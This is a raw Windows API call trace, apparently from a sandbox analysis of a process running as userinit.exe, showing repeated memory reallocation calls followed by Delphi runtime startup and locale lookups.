[0168.409] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.410] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.410] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.410] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x66000, uFlags=0x2) returned 0x13b000c
[0168.410] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.410] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.410] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.410] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x68000, uFlags=0x2) returned 0x13b000c
[0168.410] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.411] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.411] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.411] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x6a000, uFlags=0x2) returned 0x13b000c
[0168.411] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.411] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.411] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.411] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x6c000, uFlags=0x2) returned 0x13b000c
[0168.415] GlobalLock (hMem=0x13b000c) returned 0x270820
[0168.416] GlobalHandle (pMem=0x270820) returned 0x13b000c
[0168.416] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.416] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x6e000, uFlags=0x2) returned 0x13b000c
[0168.416] GlobalLock (hMem=0x13b000c) returned 0x270820
[0168.416] GlobalHandle (pMem=0x270820) returned 0x13b000c
[0168.416] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.416] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x70000, uFlags=0x2) returned 0x13b000c
[0168.481] GlobalLock (hMem=0x13b000c) returned 0x22d0048
[0168.481] GlobalHandle (pMem=0x22d0048) returned 0x13b000c
[0168.481] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.481] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x72000, uFlags=0x2) returned 0x13b000c
[0168.485] GlobalLock (hMem=0x13b000c) returned 0x2340058
[0168.486] GlobalHandle (pMem=0x2340058) returned 0x13b000c
[0168.486] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.486] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x74000, uFlags=0x2) returned 0x13b000c
[0168.486] GlobalLock (hMem=0x13b000c) returned 0x2340058
[0168.487] GlobalHandle (pMem=0x2340058) returned 0x13b000c
[0168.487] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.487] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x76000, uFlags=0x2) returned 0x13b000c
[0168.498] GlobalLock (hMem=0x13b000c) returned 0x206810
[0168.498] GlobalHandle (pMem=0x206810) returned 0x13b000c
[0168.498] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.498] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x78000, uFlags=0x2) returned 0x13b000c
[0168.503] GlobalLock (hMem=0x13b000c) returned 0x22d0048
[0168.503] GlobalHandle (pMem=0x22d0048) returned 0x13b000c
[0168.503] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.503] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x7a000, uFlags=0x2) returned 0x13b000c
[0168.508] GlobalLock (hMem=0x13b000c) returned 0x2348058
[0168.508] GlobalHandle (pMem=0x2348058) returned 0x13b000c
[0168.508] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.508] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x7c000, uFlags=0x2) returned 0x13b000c
[0168.508] GlobalLock (hMem=0x13b000c) returned 0x2348058
[0168.509] GlobalHandle (pMem=0x2348058) returned 0x13b000c
[0168.509] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.509] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x7e000, uFlags=0x2) returned 0x13b000c
[0168.570] GlobalLock (hMem=0x13b000c) returned 0x23d0048
[0168.570] GlobalHandle (pMem=0x23d0048) returned 0x13b000c
[0168.570] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.570] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x80000, uFlags=0x2) returned 0x13b000c
[0168.585] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.586] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.586] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.586] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x82000, uFlags=0x2) returned 0x13b000c
[0168.595] GlobalLock (hMem=0x13b000c) returned 0x2660020
[0168.595] GlobalHandle (pMem=0x2660020) returned 0x13b000c
[0168.596] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.596] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x84000, uFlags=0x2) returned 0x13b000c
[0168.604] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.605] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.605] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.605] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x86000, uFlags=0x2) returned 0x13b000c
[0168.660] GlobalLock (hMem=0x13b000c) returned 0x2660020
[0168.661] GlobalHandle (pMem=0x2660020) returned 0x13b000c
[0168.661] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.661] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x88000, uFlags=0x2) returned 0x13b000c
[0168.670] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.671] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.671] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.671] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x8a000, uFlags=0x2) returned 0x13b000c
[0168.680] GlobalLock (hMem=0x13b000c) returned 0x2660020
[0168.681] GlobalHandle (pMem=0x2660020) returned 0x13b000c
[0168.681] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.681] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x8c000, uFlags=0x2) returned 0x13b000c
[0168.690] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.691] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.691] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.691] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x8e000, uFlags=0x2) returned 0x13b000c
[0168.700] GlobalLock (hMem=0x13b000c) returned 0x2660020
[0168.701] GlobalHandle (pMem=0x2660020) returned 0x13b000c
[0168.701] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.701] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x90000, uFlags=0x2) returned 0x13b000c
[0168.759] GlobalLock (hMem=0x13b000c) returned 0x26f0020
[0168.760] GlobalHandle (pMem=0x26f0020) returned 0x13b000c
[0168.760] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.760] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x92000, uFlags=0x2) returned 0x13b000c
[0168.769] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.770] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.770] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.770] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x94000, uFlags=0x2) returned 0x13b000c
[0168.781] GlobalLock (hMem=0x13b000c) returned 0x2670020
[0168.781] GlobalHandle (pMem=0x2670020) returned 0x13b000c
[0168.781] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.781] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x96000, uFlags=0x2) returned 0x13b000c
[0168.792] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.793] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.793] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.793] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x98000, uFlags=0x2) returned 0x13b000c
[0168.873] GlobalLock (hMem=0x13b000c) returned 0x2670020
[0168.874] GlobalHandle (pMem=0x2670020) returned 0x13b000c
[0168.874] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.874] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x9a000, uFlags=0x2) returned 0x13b000c
[0168.884] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.885] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.885] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.885] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x9c000, uFlags=0x2) returned 0x13b000c
[0168.895] GlobalLock (hMem=0x13b000c) returned 0x2670020
[0168.896] GlobalHandle (pMem=0x2670020) returned 0x13b000c
[0168.896] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.896] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x9e000, uFlags=0x2) returned 0x13b000c
[0168.906] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0168.907] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0168.907] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.907] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xa0000, uFlags=0x2) returned 0x13b000c
[0168.965] GlobalLock (hMem=0x13b000c) returned 0x2670020
[0168.966] GlobalHandle (pMem=0x2670020) returned 0x13b000c
[0168.966] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.966] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xa2000, uFlags=0x2) returned 0x13b000c
[0168.977] GlobalLock (hMem=0x13b000c) returned 0x2720020
[0168.978] GlobalHandle (pMem=0x2720020) returned 0x13b000c
[0168.978] GlobalUnlock (hMem=0x13b000c) returned 0
[0168.978] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xa4000, uFlags=0x2) returned 0x13b000c
[0169.002] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.003] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.003] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.003] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xa6000, uFlags=0x2) returned 0x13b000c
[0169.064] GlobalLock (hMem=0x13b000c) returned 0x2680020
[0169.065] GlobalHandle (pMem=0x2680020) returned 0x13b000c
[0169.065] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.065] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xa8000, uFlags=0x2) returned 0x13b000c
[0169.078] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.078] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.078] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.079] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xaa000, uFlags=0x2) returned 0x13b000c
[0169.091] GlobalLock (hMem=0x13b000c) returned 0x2680020
[0169.092] GlobalHandle (pMem=0x2680020) returned 0x13b000c
[0169.092] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.092] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xac000, uFlags=0x2) returned 0x13b000c
[0169.151] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.152] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.152] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.152] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xae000, uFlags=0x2) returned 0x13b000c
[0169.165] GlobalLock (hMem=0x13b000c) returned 0x2680020
[0169.166] GlobalHandle (pMem=0x2680020) returned 0x13b000c
[0169.166] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.166] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xb0000, uFlags=0x2) returned 0x13b000c
[0169.178] GlobalLock (hMem=0x13b000c) returned 0x2730020
[0169.179] GlobalHandle (pMem=0x2730020) returned 0x13b000c
[0169.179] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.179] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xb2000, uFlags=0x2) returned 0x13b000c
[0169.238] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.239] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.239] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.239] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xb4000, uFlags=0x2) returned 0x13b000c
[0169.252] GlobalLock (hMem=0x13b000c) returned 0x2690020
[0169.253] GlobalHandle (pMem=0x2690020) returned 0x13b000c
[0169.254] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.254] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xb6000, uFlags=0x2) returned 0x13b000c
[0169.267] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.267] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.267] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.267] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xb8000, uFlags=0x2) returned 0x13b000c
[0169.282] GlobalLock (hMem=0x13b000c) returned 0x2690020
[0169.283] GlobalHandle (pMem=0x2690020) returned 0x13b000c
[0169.283] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.283] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xba000, uFlags=0x2) returned 0x13b000c
[0169.344] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.344] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.344] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.344] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xbc000, uFlags=0x2) returned 0x13b000c
[0169.358] GlobalLock (hMem=0x13b000c) returned 0x2690020
[0169.359] GlobalHandle (pMem=0x2690020) returned 0x13b000c
[0169.359] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.359] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xbe000, uFlags=0x2) returned 0x13b000c
[0169.372] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.373] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.373] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.373] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xc0000, uFlags=0x2) returned 0x13b000c
[0169.433] GlobalLock (hMem=0x13b000c) returned 0x2690020
[0169.434] GlobalHandle (pMem=0x2690020) returned 0x13b000c
[0169.434] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.434] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xc2000, uFlags=0x2) returned 0x13b000c
[0169.446] GlobalLock (hMem=0x13b000c) returned 0x2760020
[0169.447] GlobalHandle (pMem=0x2760020) returned 0x13b000c
[0169.447] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.447] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xc4000, uFlags=0x2) returned 0x13b000c
[0169.461] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.461] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.461] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.462] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xc6000, uFlags=0x2) returned 0x13b000c
[0169.524] GlobalLock (hMem=0x13b000c) returned 0x26a0020
[0169.525] GlobalHandle (pMem=0x26a0020) returned 0x13b000c
[0169.525] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.525] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xc8000, uFlags=0x2) returned 0x13b000c
[0169.541] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.542] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.542] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.542] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xca000, uFlags=0x2) returned 0x13b000c
[0169.559] GlobalLock (hMem=0x13b000c) returned 0x26a0020
[0169.560] GlobalHandle (pMem=0x26a0020) returned 0x13b000c
[0169.560] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.560] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xcc000, uFlags=0x2) returned 0x13b000c
[0169.624] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.625] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.625] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.625] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xce000, uFlags=0x2) returned 0x13b000c
[0169.642] GlobalLock (hMem=0x13b000c) returned 0x26a0020
[0169.643] GlobalHandle (pMem=0x26a0020) returned 0x13b000c
[0169.643] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.643] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xd0000, uFlags=0x2) returned 0x13b000c
[0169.708] GlobalLock (hMem=0x13b000c) returned 0x2770020
[0169.709] GlobalHandle (pMem=0x2770020) returned 0x13b000c
[0169.709] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.709] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xd2000, uFlags=0x2) returned 0x13b000c
[0169.726] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.727] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.727] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.727] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xd4000, uFlags=0x2) returned 0x13b000c
[0169.744] GlobalLock (hMem=0x13b000c) returned 0x26b0020
[0169.745] GlobalHandle (pMem=0x26b0020) returned 0x13b000c
[0169.745] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.745] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xd6000, uFlags=0x2) returned 0x13b000c
[0169.807] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.808] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.808] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.808] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xd8000, uFlags=0x2) returned 0x13b000c
[0169.824] GlobalLock (hMem=0x13b000c) returned 0x26b0020
[0169.825] GlobalHandle (pMem=0x26b0020) returned 0x13b000c
[0169.825] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.825] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xda000, uFlags=0x2) returned 0x13b000c
[0169.842] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.843] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.843] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.843] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xdc000, uFlags=0x2) returned 0x13b000c
[0169.899] GlobalLock (hMem=0x13b000c) returned 0x26b0020
[0169.900] GlobalHandle (pMem=0x26b0020) returned 0x13b000c
[0169.900] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.900] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xde000, uFlags=0x2) returned 0x13b000c
[0169.915] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.916] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.916] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.916] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xe0000, uFlags=0x2) returned 0x13b000c
[0169.949] GlobalLock (hMem=0x13b000c) returned 0x26b0020
[0169.950] GlobalHandle (pMem=0x26b0020) returned 0x13b000c
[0169.950] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.950] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xe2000, uFlags=0x2) returned 0x13b000c
[0169.966] GlobalLock (hMem=0x13b000c) returned 0x27a0020
[0169.967] GlobalHandle (pMem=0x27a0020) returned 0x13b000c
[0169.967] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.967] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xe4000, uFlags=0x2) returned 0x13b000c
[0169.983] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0169.984] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0169.984] GlobalUnlock (hMem=0x13b000c) returned 0
[0169.984] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xe6000, uFlags=0x2) returned 0x13b000c
[0170.044] GlobalLock (hMem=0x13b000c) returned 0x26c0020
[0170.045] GlobalHandle (pMem=0x26c0020) returned 0x13b000c
[0170.045] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.045] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xe8000, uFlags=0x2) returned 0x13b000c
[0170.060] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.061] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.061] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.061] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xea000, uFlags=0x2) returned 0x13b000c
[0170.153] GlobalLock (hMem=0x13b000c) returned 0x26c0020
[0170.154] GlobalHandle (pMem=0x26c0020) returned 0x13b000c
[0170.154] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.154] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xec000, uFlags=0x2) returned 0x13b000c
[0170.171] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.172] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.172] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.172] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xee000, uFlags=0x2) returned 0x13b000c
[0170.189] GlobalLock (hMem=0x13b000c) returned 0x26c0020
[0170.190] GlobalHandle (pMem=0x26c0020) returned 0x13b000c
[0170.190] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.190] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xf0000, uFlags=0x2) returned 0x13b000c
[0170.207] GlobalLock (hMem=0x13b000c) returned 0x27b0020
[0170.207] GlobalHandle (pMem=0x27b0020) returned 0x13b000c
[0170.207] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.207] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xf2000, uFlags=0x2) returned 0x13b000c
[0170.236] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.237] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.237] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.237] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xf4000, uFlags=0x2) returned 0x13b000c
[0170.254] GlobalLock (hMem=0x13b000c) returned 0x26d0020
[0170.255] GlobalHandle (pMem=0x26d0020) returned 0x13b000c
[0170.255] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.255] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xf6000, uFlags=0x2) returned 0x13b000c
[0170.273] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.273] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.273] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.273] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xf8000, uFlags=0x2) returned 0x13b000c
[0170.291] GlobalLock (hMem=0x13b000c) returned 0x26d0020
[0170.292] GlobalHandle (pMem=0x26d0020) returned 0x13b000c
[0170.292] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.292] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xfa000, uFlags=0x2) returned 0x13b000c
[0170.309] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.310] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.310] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.310] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xfc000, uFlags=0x2) returned 0x13b000c
[0170.328] GlobalLock (hMem=0x13b000c) returned 0x26d0020
[0170.329] GlobalHandle (pMem=0x26d0020) returned 0x13b000c
[0170.329] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.329] GlobalReAlloc (hMem=0x13b000c, dwBytes=0xfe000, uFlags=0x2) returned 0x13b000c
[0170.346] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.347] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.347] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.347] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x100000, uFlags=0x2) returned 0x13b000c
[0170.364] GlobalLock (hMem=0x13b000c) returned 0x26d0020
[0170.365] GlobalHandle (pMem=0x26d0020) returned 0x13b000c
[0170.365] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.365] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x102000, uFlags=0x2) returned 0x13b000c
[0170.385] GlobalLock (hMem=0x13b000c) returned 0x27e0020
[0170.386] GlobalHandle (pMem=0x27e0020) returned 0x13b000c
[0170.386] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.386] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x104000, uFlags=0x2) returned 0x13b000c
[0170.405] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.406] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.406] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.406] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x106000, uFlags=0x2) returned 0x13b000c
[0170.425] GlobalLock (hMem=0x13b000c) returned 0x26e0020
[0170.426] GlobalHandle (pMem=0x26e0020) returned 0x13b000c
[0170.426] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.426] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x108000, uFlags=0x2) returned 0x13b000c
[0170.444] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.445] GlobalHandle (pMem=0x25d0020) returned 0x13b000c
[0170.445] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.445] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x10a000, uFlags=0x2) returned 0x13b000c
[0170.463] GlobalLock (hMem=0x13b000c) returned 0x26e0020
[0170.464] GlobalHandle (pMem=0x26e0020) returned 0x13b000c
[0170.464] GlobalUnlock (hMem=0x13b000c) returned 0
[0170.464] GlobalReAlloc (hMem=0x13b000c, dwBytes=0x10c000, uFlags=0x2) returned 0x13b000c
[0170.482] GlobalLock (hMem=0x13b000c) returned 0x25d0020
[0170.482] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x26e0000
[0170.482] VirtualAlloc (lpAddress=0x26e0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x26e0000
[0170.522] GetKeyboardType (nTypeFlag=0) returned 4
[0170.522] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0170.522] GetStartupInfoA (in: lpStartupInfo=0xaf410 | out: lpStartupInfo=0xaf410*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0170.522] GetVersion () returned 0x1db10106
[0170.522] GetVersion () returned 0x1db10106
[0170.522] GetCurrentThreadId () returned 0x518
[0170.522] GetModuleFileNameA (in: hModule=0x27f0000, lpFilename=0xaef0c, nSize=0x105 | out: lpFilename="\x1cï\n" (normalized: "c:\\windows\\system32\\\x1cï\n")) returned 0x0
[0170.522] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xaede7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.522] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xaeefc | out: phkResult=0xaeefc*=0x0) returned 0x2
[0170.522] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xaeefc | out: phkResult=0xaeefc*=0x0) returned 0x2
[0170.522] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xaeefc | out: phkResult=0xaeefc*=0x0) returned 0x2
[0170.522] lstrcpynA (in: lpString1=0xaede7, lpString2="\x1cï\n", iMaxLength=261 | out: lpString1="\x1cï\n") returned="\x1cï\n"
[0170.522] GetThreadLocale () returned 0x409
[0170.522] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xaeef7, cchData=5 | out: lpLCData="ENU") returned 4
[0170.522] lstrlenA (lpString="\x1cï\n") returned 3
[0170.522] LoadStringA (in: hInstance=0x27f0000, uID=0xffc4, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0170.522] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x20dcc0
[0170.522] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2910000
[0170.523] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x20ecc0
[0170.523] VirtualAlloc (lpAddress=0x2910000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2910000
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffc3, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0170.523] LoadStringA (in: hInstance=0x27f0000, uID=0xffc1, lpBuffer=0xaf030, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
